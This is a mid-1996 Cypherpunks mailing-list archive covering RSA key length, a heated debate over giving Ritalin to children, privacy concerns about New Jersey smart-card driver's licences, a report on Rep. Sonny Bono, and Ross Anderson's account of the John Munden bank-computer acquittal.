Subject: Re: A case for 2560 bit keys
Message-ID: <199607092058.NAA05528@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:09 PM 7/8/96 -0400, David F. Ogren wrote:

>And so we have to ask ourselves, why _not_ use a 2047+ bit key.  It has 
>greater longevity and greater security.  Why not be overcautious when 
>the cost is so small?

I don't think it's going to make a great deal of difference.  We've "all" 
shifted to 1024-bit keys, even though it's unlikely anybody will have the 
resources to crack them for decades if not centuries.  And the moment any 
government prosecutes anyone with information obtained by a decrypt of a 
1024-bit key, the (then) stragglers will join the rest of us at 1500 or 
2000+.  The government knows this and there's nothing it can do about it, 
except possibly for GAK and it isn't making much headway in that.

The most negative part of a long key is the false sense of security it may 
engender in the weak-minded:  All key sizes are equally insecure from a 
computer black-bag job or a specially-engineered virus.  If you're really 
interested in your future security, probably the best thing you can do is to 
convince Congress to write legislation to ban negotiations and/or treaties 
with other countries which in any way ban or restrict encryption, preventing 
Klinton from doing an end-run around the Bill of Rights with regard to the 
1st amendment.

Maybe it's just too much of a wish-list item, but a I'd like to see a legal 
prohibition on the government attempting to decrypt any information that it 
didn't (legally; with authorization) have the key to when it collected that 
information.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 10 Jul 1996 08:25:06 +0800
To: mpd@netcom.com (Mike Duvos)
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <199607091632.JAA20423@netcom22.netcom.com>
Message-ID: <199607091807.OAA13871@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Mike Duvos writes:
>  > One of my wishes did come true, and that was finding out
>  > that I do have ADD.
> 
> This is really a telling statement, isn't it?  After all, we
> rarely hear people saying their greatest wish is to find out that
> they have liver disease, or cancer, or heart trouble.

A total distortion of the man's point. Imagine someone suffering from
an unknown ailment for years. One day, he is finally diagnosed, a
treatment is given, and he feels better.

All you can do is try to argue that he shouldn't be treated.

> The problem here is that we live in a society that won't cut any
> slack for normal human diversity unless you have some sort of
> official disease defined by the medical profession.

Did you listen to that guy at all? He was in pain and anguish over the
fact that his life was totally screwed up in spite of his best efforts
to make a go at work he loved. Now he can function. You want him to be
"diverse" and go on not functioning. He doesn't want that. Who are you
to tell him how live his own life?


Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 10 Jul 1996 07:48:31 +0800
To: cypherpunks@toad.com
Subject: Re: Word lists for passphrases
In-Reply-To: <2.2.32.19960709165921.006856d0@smtp1.abraxis.com>
Message-ID: <v03007614ae084daa65c2@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:59 PM -0400 7/9/96, camcc@abraxis.com wrote:
> At 07:20 PM 7/8/96 -0400, you wrote:
> 
> :Human stupidity is never a surprise.
> :
> :Perry
> 
> Perry is a significant factor I include when I decide every day whether or
> not to check my cypherpunk's mail. I'm glad I did today. What a hoot!

Amen to that. Get 'em, Perry.

In Tim's defense, however, I agree that it seems the vehemence of his arguments stem more from repugnance at state-sponsored psychochemical social control than anything else.

That, and the *utter* certainty of his opinions, of course. ;-).

Cheers,
Bob Hettinga




-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Tue, 9 Jul 1996 17:27:02 +0800
To: cypherpunks@toad.com
Subject: ACLU: NJ Alert! Personal Data Chip in DL! (fwd)
Message-ID: <199607090515.PAA17618@suburbia.net>
MIME-Version: 1.0
Content-Type: text


Forwarded message:
>From notes@igc.org  Tue Jul  9 15:12:01 1996
Date: Mon, 08 Jul 1996 19:48:10 -0700 (PDT)
Reply-To: Moderator of conference "justice.polabuse" <bwitanek@igc.apc.org>
From: Bob Witanek <bwitanek@igc.apc.org>
Subject: ACLU: NJ Alert! Personal Data Chip in DL!
To: Recipients of pol-abuse <pol-abuse@igc.apc.org>
Message-ID: <APC&1'0'a9f989e8'c0a@igc.apc.org>
X-Gateway: conf2mail@igc.apc.org
Errors-To: owner-pol-abuse@igc.apc.org
Precedence: bulk
Lines: 32

Posted:  sspnj@exit109.com

                         *Computer Chips in Driver Licenses?*

NEWARK, N.J. -- The Associated Press reported today that drivers
may soon be using a new high-tech driver's license to pay tolls and
do banking in New Jersey. The soon to be tested  "Smart Card" will
carry a data packed computer chip that will provide authorities
with access to private information including fingerprints and
medical records.

The pilot cards will be limited to standard driver's license
information. By the time the cards are issued to all New Jersey
drivers in July 1997, they would also contain fingerprints and an
"electronic purse" to be used to pay bus and train fares, the AP
said.

Civil libertarians said the new licenses raise privacy concerns. 
 Ultimately, the AP said, the license will contain arrest records,
medical records, vehicle registration, and could be used as a debit
card to pay for groceries and do banking.

"I think citizens should be extremely scared about loss of
privacy," David Rocah of the New Jersey ACLU told AP. "They could
store tax data. They could store medical data. They could store
driver's records, insurance data, virtually any data in the
government's possession."

The ACLU also warned that the potential for misuse of the
information --government surveillance or telemarketing research -
- could pose potential problems.
----------------------------------------------------------------


-- 
"Of all tyrannies a tyranny sincerely  exercised for the good of its victims  
 may be the most  oppressive.  It may be better to live under  robber barons  
 than  under  omnipotent  moral busybodies,  The robber baron's  cruelty may  
 sometimes sleep,  his cupidity may at some point be satiated; but those who  
 torment us for own good  will torment us  without end,  for they do so with 
 the approval of their own conscience."    -   C.S. Lewis, _God in the Dock_ 
+---------------------+--------------------+----------------------------------+
|Julian Assange RSO   | PO Box 2031 BARKER | Secret Analytic Guy Union        |
|proff@suburbia.net   | VIC 3122 AUSTRALIA | finger for PGP key hash ID =     |
|proff@gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 |
+---------------------+--------------------+----------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 10 Jul 1996 12:07:06 +0800
To: cypherpunks@toad.com
Subject: Re: Contracts, Responsibilities, and Drug-Dispensing
Message-ID: <199607092212.PAA15529@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I think the really interesting question underlying this whole discussion is
how a minor child makes the legal transition to a competent adult.  This
issue comes up again and again.  We see it in "parental consent" laws
requiring parental consent for a minor girl to get an abortion.  We also
see it in issues like when a minor child may throw off the "protection" of
products like SurfWatch.

ObCrypto: When may a minor child say no to PAK (Parental Access to Keys)?


-------------------------------------------------------------------------
Bill Frantz       | The Internet may fairly be | Periwinkle -- Consulting
(408)356-8506     | regarded as a never-ending | 16345 Englewood Ave.
frantz@netcom.com | worldwide conversation.    | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Wed, 10 Jul 1996 09:44:09 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: [Poster] Add Uncle Sam to Your Circle of Friends and Family
Message-ID: <Pine.SUN.3.94.960709152150.21622A-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


http://www.rsa.com/rsa/gallery/circle1.gif

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's hot here.  And humid. PLUS: Bertha Watch





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark O. Aldrich" <maldrich@grci.com>
Date: Wed, 10 Jul 1996 10:33:29 +0800
To: Ray Arachelian <sunder@dorsai.dorsai.org>
Subject: Re: Put Uncle Sam in your Calling Circle
In-Reply-To: <Pine.SUN.3.91.960709111153.3387B-100000@dorsai>
Message-ID: <Pine.SCO.3.93.960709152538.11256A-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 9 Jul 1996, Ray Arachelian wrote:

> I just got a really cool poster from RSA.  It's a big circle split off 
> into several sections showing people talking to each other, the upper 
> right hand corner shows two NSA dweebs looking like Bevis & Butthead in 
> suits, one smoking, the other seated infront of an old 60's reel to reel 
> audio tape recorder, a sign on the wall behind them says "Key Escrow"
> 
> Many many thanks to the cool person(s) at RSA who sent it my way.

THE QUESTION THAT (therefore) BEGS TO BE ASKED:

How can all the rest of us get copies, or are you just rubbing our
collective noses in the "I got one and you don't" dirt?  :)

------------------------------------------------------------------------- 
|Just as the strength of the Internet is  |Mark Aldrich                 |
|chaos, so the strength of our liberty    |GRCI INFOSEC Engineering     |
|depends upon the chaos and cacophony of  |maldrich@grci.com            |
|the unfettered speech the First Amendment|MAldrich@dockmaster.ncsc.mil |
|protects - District Judge Stewart Dalzell|                             |
|_______________________________________________________________________|
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     |
|         and my employer gets no credit for them whatsoever.           |
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Wed, 10 Jul 1996 10:13:32 +0800
To: cypherpunks@toad.com
Subject: Rep. Sonny Bono speaks at NPC on online copyright
Message-ID: <v01510102ae0873ea677b@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain





Date: Tue, 9 Jul 1996 15:07:41 -0500
To: fight-censorship+@andrew.cmu.edu
From: declan@well.com (Declan McCullagh)
Subject: Rep. Sonny Bono speaks at NPC on online copyright

I just got back from hearing Rep. Sonny Bono (R-Calif) speak at the
National Press Club this afternoon.

The topic was "Intellectual Property" -- timely enough since Bono sits
on the House subcommittee considering the online copyright bill
(HR2441) I've railed against in the past. As a former member of the
entertainment industry, he's a stauch supporter of that ill-advised
legislation, which is opposed by the Digital Future Coalition.

Given the topic of his speech, I kinda expected him to talk about,
well, maybe intellectual property.

I was wrong. He spent most of an hour rambling incoherently about his
life ("I had to lug beef to get started in the music business") and how
he really wasn't a politican after all. Not to put too fine a point on
it, he's a bit of a dimwit. (Someone sitting at my table told me that a
recent Washingtonian mag dubbed him the dumbest member of Congress.)
Bono is one of the few politians that could make Bob Dole sound
intelligent and eloquent.

I brought a friend along to the banquet. (Since I'm a member of the NPC
-- actually the first cyber-journalist to be admitted to the club -- I
can bring one guest.) She slipped me a note halfway through: "He is
honest. If he were smarter, and honest, probably no one would listen to
him."

She's right. Bono did seem honest. He was truly convinced, in some
kind of inchoate way, that intellectual property piracy online was
really a problem. So he supports this wretched legislation without
grokking what it would do to the Net.

Unfortunately, the question I submitted ("What are the major concerns
the entertainment industry has regarding copyright and the Net?") didn't
get asked, so instead we were treated to hearing Bono talk about Cher.
"I hope she doesn't put on any more tattoos." And if he'd sing a song
for the audience: "I've got you babe!"

*sigh*

-Declan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JR@ns.cnb.uam.es
Date: Wed, 10 Jul 1996 01:45:01 +0800
To: cypherpunks@toad.com
Subject: Re: [RANT] Giving Mind Control Drugs to Children
Message-ID: <960709155621.21003a36@ROCK.CNB.UAM.ES>
MIME-Version: 1.0
Content-Type: text/plain


>One can only wonder how much more great some of the people on this list would 
>be today if they knew ADD back then. 
>
	That a fallacy. First, there's no way to know what they suffered if
anything at all. Second, there's no way to know what would have happened.
Third, there's what they themselves said.

	I know of many people who has your same signs. Hey you should see
*my* office. And you should have seen it when I could devote myself to
interesting things instead of XXXX(whateverI don't like) crap.

	Someone said about a kid not concentrating on grammar. Hell, I
couldn't stand half of my professors in class, though I would perfectly
listen to the same subject with other people. I don't know about you and
don't pretend to tell you anything. But there are lots of cases in which
the problem is *on the other side* (society, teachers, work, parents,
priests, erroneous expectatives). I wonder how can we know from the
external manifestations that those people were ADD and not just brilliant
guys with dull teachers.

	As for those people you mentioned. Maybe if they had prozac they
would have been perfect, quiet and compliant citizens, concentrated on
what the power-that-be asked them to do. Think of Einstein happily working
for Hitler, not worried about other themes (like ethical implications for
instance).

	Thing is, it's very easy to keep everybody uniform. Easier than
giving equal opportunities to less-good workers or allowing one to attempt
many projects lest one succeeds and changes the stablishment! Let's make
everyone into a uniform clone, and those who can't be made -say Down
syndrome people- be exterminated. Let's enterprising people be forced
into non-creative jobs, and if they don't like, be given drugs.

	Yeah! Let's monitor what everybody says, detect those guys who
spend too much time at work reading cypherpunks or worrying about politics
(which is not their job) and control them. Let's tap all their conversa-
tions and force them to fit our idea of a uniform world of mediocre wits
who just work perfectly in what we tell them and never question anything.

	I also wonder how those people you mentioned would have been
allowed to do such great discoveries and destroy the grounds of their
societies under the society we are heading to.

	 "The World turning around the Sun? C'mon! Everybody knows it is 
flat and the Center of the Universe. That Galileo guy is obviously sick. 
Let's calm him down with some drugs so he can concentrate on Theology as 
it should well be"...

	Sorry, I think we need unfitted people, feeling unhappy about the
society to make it evolve.

				jr





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Adams" <adamsc@io-online.com>
Date: Wed, 10 Jul 1996 15:53:22 +0800
To: "cypherpunks" <wendigo@gti.net>
Subject: Re: CWD -- Jacking in from the "Keys to the Kingdo
Message-ID: <199607092315.QAA28715@cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


On 5 Jul 96 12:41:54 -0800, wendigo@gti.net wrote:

>: It would actually take less creativity to do the other things, bypass the
>: config.sys, etc. The child would thus be perhaps a little TOO creative. :)

>B)  Forget the CONFIG.SYS ... what about kids using Macs or some future
>    "Kid Safe" system that has the filters in an eeprom?  I'm talking
>    about bypassing the censorship on the client-server level.  Relatively
>    platform independent.

I doubt it will ever happen, for two reasons: 1) people always forget
passwords and/or have system problems. There will always be a need for
system disks or CDs. If parents don't trust their kids (and the ones most
worred don't; if they trust their kids, they're not going to worry about
what they're doing in the first place) chances are they're still not
going to lock up the CD and keep the kid from borrowing one from a
friend, etc. Also, most parents tend to be sloppy with passwords - it's
easy to observe them entering it, etc. 2) Most parents need the kid to
keep the computer working. They a) don't have the knowledge/skill to keep
the kid out and b) need to give him access to repair things. If their kid
is in fixing a problem, dropping the security software is trivial (better
yet: "Mom. Guess what! The bug was in NetNanny").

// Chris Adams <adamsc@io-online.com> - Webpages for sale! Se habla JavaScript!
// Automatically receive my resume or PGPKEY by sending email with a subject
// of 'send PGPKEY' or 'send resume'. Capitalization counts so be careful!
 

                                                                                                                                                                                                                                             








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew Carpenter <mcarpent@mailhost.tcs.tulane.edu>
Date: Wed, 10 Jul 1996 15:09:27 +0800
To: bryce@digicash.com
Subject: Re: more about the usefulness of PGP
In-Reply-To: <199607061957.VAA21682@digicash.com>
Message-ID: <199607092115.QAA78592@rs6.tcs.tulane.edu>
MIME-Version: 1.0
Content-Type: text/plain


bryce@digicash.com wrote:
> 
> Here's an idea that I always wanted to implement but never did
> yet.  I thought I'd share and if someone else has already done
> it let me have a copy.
> 
> 
> I should be able to execute scripts remotely by sending e-mail
> to an account.  Simple mail-handling scripts at that account
> should check the PGP signature (and timestamp/counter to prevent
> replay/delay attacks) and then pass the contents to a full
> script-language interpreter.
> 
> 
> Perl is a natural choice of interpreter.  Has anybody
> implemented this (hopefully complete with replay/delay 
> prevention)?
> 
> 
> Thanks!
> 
> Bryce
> 
> P.S.  No, actually I can't think of any good use for this
> trick.  But maybe if I had it I would find good uses for it.
> 

I'd been thinking of something along those lines as well, but never got
around to actually trying it. 

But I had some free time yesterday and got a system setup which uses
procmail to pass on the message to a perl script which then decrypts the
message if necessary and checks the signature.  If the signature is good
it then executes the scrypt, encrypts the output from the script, and
mails it back.  I haven't had a chance to do any extensive testing, and
it doesn't have any replay/delay prevention yet.  I should have some
time in a day or two to clean it up though.  Just wanted to let
you know that someone is working on it.  I don't want to distribute it
yet, since it is still rather messy and possibly buggy.


--Matt

--
mcarpent@mailhost.tcs.tulane.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eli+@gs160.sp.cs.cmu.edu
Date: Wed, 10 Jul 1996 10:24:30 +0800
To: cypherpunks@toad.com
Subject: Re: Metered Phone
In-Reply-To: <+cmu.andrew.internet.cypherpunks+wlsUPSm00UfAA10MIt@andrew.cmu.edu>
Message-ID: <199607092018.NAA19923@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <+cmu.andrew.internet.cypherpunks+wlsUPSm00UfAA10MIt@andrew.cmu.edu>, Jerome once again writes:
>Every dial will be counted, every seconds will be measured...

Every gratuitous repost will be *penalized*...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 10 Jul 1996 11:04:13 +0800
To: mpd@netcom.com (Mike Duvos)
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <199607091902.MAA18000@netcom14.netcom.com>
Message-ID: <199607092034.QAA14218@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Mike Duvos writes:
> Inventing mythological ailments and "politicizing dissent" has
> other disadvantages as well.  Little Johnny's perfectly valid
> criticisms of the local NEA stormtrooper can be easily dismissed
> by an explanation that Johnny has "Authority Defiance Disorder",
> or some other convenient thing that permits Johnny to be tranked
> senseless whenever he might say something awkward in public.

The abuse of psychiatry as an instrument of opression is not new, of
course. The Soviet Union used it regularly.

However, if anything, Ritalin gives a person with ADD the tools with
which to more effectively subvert authority. Its very hard to smash
the state, or even plot to get even with your boss, when you can't
concentrate sufficiently to execute your plans. It may be true that
someone will be less likely to impulsively act out against authority
under its influence, but such impulses rarely actually produce any
sort of lasting impact -- they only get one in trouble. By contrast,
effective subversion requires patience and self discipline, which is
precisely what an ADD sufferer does not have.

In short, if one really was trying to narcotize a troublemaker,
tranquilizers and the like are probably far better than Ritalin and
other amphetamines, which, in spite of Tim's pronouncements, do not
act as tranquilizers.

>  > Did you listen to that guy at all? He was in pain and
>  > anguish over the fact that his life was totally screwed up
>  > in spite of his best efforts to make a go at work he loved.
>  > Now he can function. You want him to be "diverse" and go on
>  > not functioning. He doesn't want that. Who are you to tell
>  > him how live his own life?
> 
> The human body is a homeostatic system.  Let's see what this
> guy's mood looks like in 30 years and see how he feels about
> Ritalin taking then.  By that time, he may be taking the same
> dose he is today just to feel as rotten as he did before he
> started taking it at all.

Actually, some ADD sufferers actually need less medication with time,
as the ability to concentrate for prolonged periods gives them the
chance to work on non-drug based coping strategies which are difficult
to work on without the meds.

Perhaps you ought to examine the scientific literature rather than
simply deciding to guess.


Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 10 Jul 1996 11:14:57 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Contracts, Responsibilities, and Drug-Dispensing
In-Reply-To: <ae07fd960d021004be78@[205.199.118.202]>
Message-ID: <199607092044.QAA14236@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> -- If someone makes a contract, formal or informal (with some caveats), to
> supply a dose of drugs, alcohol, whatever, at some specified time, then
> this is fine. But if no contract exists, not supplying the drugs is not
> interference in choice. (Is, for a example, a Mormon interfering in the
> rights of a friend by refusing to supply a drink to a visiting friend? Am I
> interfering in the choice of others by refusing to allow cigarette smoking
> in my home? Examples like this are easy to find.)

If you bring a child to someone's home, and you tell them "here are
the kids' meds -- you'll give them to the kid on time, right?" and you
say "No" right then, thats fine. However, your friend accepted custody
of the medication and of the child, did not indicate that they had no
intention of dispensing the child's medication on time, and in essense
failed to comply with normal standards of behavior -- contractual
behavior, as it were. It appears that you are trying very hard to
retrofit this behavior into your theory of what's acceptable for
people to do based on your personal distaste for a particular
treatment -- a treatment you do not understand for a condition you do
not understand, impacting a child that is not your own.

> -- If someone claims there is an _implied_ contract in this case, this
> falls apart after the first "refusal" to supply the dose. That is, Vickie,
> the mother, is well aware that my friend is returning the Ritalins to her
> unused, in the kid's backpack.

I agree that the mother at that point understands what is going on and
shouldn't be sending the child over. However, I'd say that as a social
matter, the person refusing to give the child their medicine is not
doing anyone a favor. "You see, my son, I'm demonstrating that I can
be Holier than Thou by refusing to give your playmate the medication
his parents instructed me to give him. Since I have a right not to do
so, I can exercise that right and create stress and demonstrate how
little regard I have for the way people choose to raise their own
children. Someday you can follow in my footsteps."

> It's always useful in discussing "rights," as Perry is doing,

I believe I was discussing a cognitive problem, actually, and not
rights. The only right I discussed in detail was every person's
right to tell you to mind your own business, just as you loudly tell
everyone else.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 10 Jul 1996 13:09:16 +0800
To: JR@ns.cnb.uam.es
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <960709215703.21003a36@ROCK.CNB.UAM.ES>
Message-ID: <199607092048.QAA14244@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



JR@ns.cnb.uam.es writes:
> >I bet you go up to people in near suicidal states and tell them "hey,
> >get a life", don't you.

> Sorry, Perry, but that's a cultural matter.

Ah, so presumably that IS what you do with people who feel
depressed. Comforting them would be too humane, I suppose. The right
thing to do is to kick them in the balls and teach them a lesson,
right?

> 	As long as they have a free will. Then comes disease, when one is
> not able to decide by him/herself. If I were to make a blood transfusion
> to someone refusing it on religious grounds I wouldn't be much different
> from the gov't imposing some crypto scheme on the basis of its own moral
> grounds. Is it that what you are proposing?

No. I am proposing that people who wish to voluntarily take a medicine
that they feel improves their condition be left the hell alone by
busybodies like you, Tim May, et al.


Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Adams" <adamsc@io-online.com>
Date: Wed, 10 Jul 1996 13:11:09 +0800
To: "cypherpunks" <cypherpunks@toad.com>
Subject: Re: Moviepunks
Message-ID: <199607092350.QAA24217@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


On 4 Jul 96 20:44:14 -0800, frissell@panix.com wrote:

>"Somehow, I doubt William Jefferson Blythe Clinton would fly an F-15 against
>a monster alien craft."

He'd wait to finish shredding those files before leaving...

// Chris Adams <adamsc@io-online.com> - Webpages for sale! Se habla JavaScript!
// Automatically receive my resume or PGPKEY by sending email with a subject
// of 'send PGPKEY' or 'send resume'. Capitalization counts so be careful!
 

                                                                                                                                                                                                                                             








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonl@well.com
Date: Wed, 10 Jul 1996 13:58:55 +0800
To: cypherpunks@toad.com
Subject: Eric Hughes at EF Forum
Message-ID: <199607100011.RAA22500@well.com>
MIME-Version: 1.0
Content-Type: text


Cypherpunk/cryptographer Eric Hughes will join yours truly at this week's 
Electronic Frontiers Forum, Thursday, 6PM Pacific Daylight Time.

javachat at http://talk.wired.com
or
telnet to talk.wired.com

-- 

Jon Lebkowsky <jonl@hotwired.com>                 http://www.well.com/~jonl
Electronic Frontiers Forum, 6PM PDT Thursdays  <http://www.hotwired.com/eff>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Wed, 10 Jul 1996 14:09:46 +0800
To: Bill Frantz <frantz@netcom.com>
Subject: Re: Contracts, Responsibilities, and Drug-Dispensing
In-Reply-To: <199607092212.PAA15529@netcom7.netcom.com>
Message-ID: <Pine.SUN.3.94.960709165857.3540B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 9 Jul 1996, Bill Frantz wrote:

> ObCrypto: When may a minor child say no to PAK (Parental Access to Keys)?

Interesting threat model... What can one do in the total absense of
physical security?  We've talked about mental cryptography before, but I
think we agreed that it isn't very practical.  Perhaps security through
obscurity is a better solution here, since many parents are less computer
literate than their children.

Perhaps in the future kids will get non-removable tamperproof
microchip implants behind their parents' backs. :)

Wei Dai






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 10 Jul 1996 15:16:09 +0800
To: perry@piermont.com
Subject: Re: [RANT] Giving Mind Control Drugs to Children
Message-ID: <01I6VLB17Q2O984QJY@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"perry@piermont.com"  9-JUL-1996 07:29:49.72

>get on with their lives. Maybe you would prefer to "help" them by not
>letting them get medication. Maybe its "unnatural". Could you explain
>to me, however, how you are making their lives better by not giving
>them their meds? I mean, what concretely is better about their lives?

	Quite. Besides which, what's wrong with something being "unnatural"?
If you define doing something to modify how one naturally
thinks/behaves/whatever as "unnatural", then all education is unnatural, child
raising is unnatural, etcetera; all these modify neural patterns in the long
run.
	All this is more in the area of transhumanism than of cypherpunks, BTW,
although I can see some _possible_ relevance.

Mike Duvos writes:

>> Again, to return to the height analogy, doctors have to throw
>> short parents seeking human growth hormone[...]

>You miss the point. You spoke of involuntarily medicated kids. Most of
>the kids aren't involuntarily medicated.

	I wasn't, and I won't be when I go back on it (shortly, I hope). I
noticed the difference that it made (as did my teachers), and I preferred it.

>> The price of giving the patient (or the patient's parents)
>> everything they want is [...] classrooms full of obedient
>> citizen-units in Soma-induced trances.

>Ritalin does not induce a zombie-like trance, as the numerous people
>on this mailing list who take it can tell you.

	Most definitely agreed. While on it, I found myself much better able to
do what _I_ ultimately wanted to do.
	-Allen

P.S. Thank you, Perry.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 10 Jul 1996 16:38:50 +0800
To: cypherpunks@toad.com
Subject: Important UK court case
Message-ID: <v0300760bae0881b2f082@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>From the strong-network/weak-transaction model hits the wall dept....

Cheers,
Bob Hettinga

--- begin forwarded text


To: set-discuss@commerce.net
Subject: Important UK court case
Date: Tue, 09 Jul 1996 12:13:28 +0100
From: Ross Anderson <Ross.Anderson@cl.cam.ac.uk>
Sender: owner-set-talk@commerce.NET
Precedence: bulk

+----------------------------------------------------+
Addressed to: set-discuss@commerce.net
+----------------------------------------------------+

At a trial in England yesterday, a judge decided that if a bank was
not prepared to let their computer systems be examined by a hostile
expert witness, then they could not even present bank statements
in evidence.

At least SET has been done right - I believe it is the first
significant banking protocol to have undergone an open design
review. I hope that there will be implementations that have also
undergone credible scrutiny.

I append a note of the case that I posted to our supporters.

Ross Anderson


*********************************************************************

John Munden is acquitted at last!

At twenty past two today, John Munden walked free from Bury Crown
Court. This resolved a serious miscarriage of justice, and ended an
ordeal for John and his family that has lasted almost four years.

In a judgment loaded with significance for the evidential value of
cryptography and secure systems generally, His Honour Justice John
Turner, sitting with two assessors, said that when a case turns on
computers or similar equipment then, as a matter of common justice,
the defence must have access to test and see whether there is anything
making the computers fallible. In the absence of such access, the
court would not allow any evidence emanating from computers.

As a result of this ruling, the prosecution was not in a position to
proceed, and John Munden was acquitted.

John was one of our local policemen, stationed at Bottisham in the
Cambridge fenland, with nineteen years' service and a number of
commendations. His ordeal started in September 1992 when he returned
from holiday in Greece and found his account at the Halifax empty. He
complained and was told that since the Halifax had comfidence in the
security of its computer system, he must be mistaken or lying. When
he persisted, the Halifax reported him to the police complaints
authority for attempted fraud; and in a trial whose verdict caused
great surprise, he was convicted at Mildenhall Magistrates' Court on
the 12th February 1994.

I told the story of this trial in a post to comp.risks (see number
15.54 or get ftp.cl.cam.ac.uk/users/rja14/post.munden1).  It turned
out that almost none of the Halifax's `unresolved' transactions were
investigated; they had no security manager or formal quality assurance
programme; they had never heard of ITSEC; PIN encryption was done in
software on their mainframe rather than using the industry-standard
encryption hardware, and their technical manager persisted in claiming
(despite being challenged) that their system programmers were unable
to get at the keys. Having heard all this, I closed my own account at
the Halifax forthwith and moved my money somewhere I hope is safer.

But their worships saw fit to convict John.

An appeal was lodged, but just before it was due to be heard - in
December 1994 - the prosecution handed us a lengthy `expert' report by
the Halifax's accountants claiming that their systems were secure.
This was confused, even over basic cryptology, but it was a fat and
glossy book written by a `big six' firm with complete access to the
Halifax's systems - so it might have made an impression on the court.
We therefore applied for, and got, an adjournment and an order giving
me - as the defence expert witness - `access to the Halifax Building
Society's computer systems, records and operational procedures'.

We tried for nine months to enforce this but got nowhere. We
complained, and the judge ordered that all prosecution computer
evidence be barred from the appeal. The Crown Prosecution Service
nonetheless refused to throw in the towel, and they tried to present
output such as bank statements when the appeal was finally heard
today.

However, the judge would have none of it.

For the computer security community, the moral is clear: if you are
designing a system whose functions include providing evidence, it had
better be able to withstand hostile review.

Ross

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This message was sent by set-discuss@commerce.net.  For a complete listing
of available commands, please send mail to 'majordomo@commerce.net'
with 'help' (no quotations) contained within the body of your message.

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Wed, 10 Jul 1996 15:47:32 +0800
To: "David F. Ogren" <ogren@cris.com>
Subject: Re: A case for 2560 bit keys
Message-ID: <199607092154.RAA24946@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


